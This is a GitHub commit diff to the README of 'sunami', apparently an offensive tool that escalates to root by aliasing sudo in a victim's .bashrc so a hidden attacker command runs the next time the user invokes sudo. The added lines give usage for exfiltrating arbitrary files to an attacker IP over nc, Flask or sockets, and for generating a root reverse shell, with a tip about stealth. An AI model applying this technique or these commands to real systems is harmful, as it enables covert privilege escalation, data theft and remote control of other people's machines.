Update README.md
witchdocsec
GitHub
parent
ae6de7101a
commit
df7f9a6d45
|
|
@ -4,14 +4,18 @@
|
||||||
This is not an exploit just a cheap but effective trick. The usecase is when you have a shell on a sudoers account but no sudo cred.
|
This is not an exploit just a cheap but effective trick. The usecase is when you have a shell on a sudoers account but no sudo cred.
|
||||||
It works by manipulating sudo via aliasing in their .bashrc file to prepend a malicious attacker specified command first in the background.
|
It works by manipulating sudo via aliasing in their .bashrc file to prepend a malicious attacker specified command first in the background.
|
||||||
This does mean you will need to wait for sudo to be executed.
|
This does mean you will need to wait for sudo to be executed.
|
||||||
|
flags denoted with -- are required. with - optional.
|
||||||
|
the -local flag denotes that you want sunami to modify the .bashrc file on the current machine instead of producing output (not suggested for stealth reasons).
|
||||||
|
|
||||||
|
|
||||||
# File Exfiltration
|
# File Exfiltration
|
||||||
I used passwd so as not to leak my hash for this demo but rest assured you can read whatever file you wish
|
I used passwd so as not to leak my hash for this demo but rest assured you can read whatever file you wish
|
||||||
|
|
||||||
|
## useage:
|
||||||
|
python3 sunami.py exfilfile [-local {1,0}] [--file FILE] [--method {postflask,nc,pysocket}] [--ip IP] [--port PORT]
|
||||||
# Root Shell
|
# Root Shell
|
||||||
|
|
||||||
|
## useage:
|
||||||
|
sunami.py genshell [-local {1,0}] [--ip IP] [--port PORT] [-shell SHELL] [-protocol PROTOCOL] [-listen {1,0}]
|
||||||
|
|
||||||
|
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue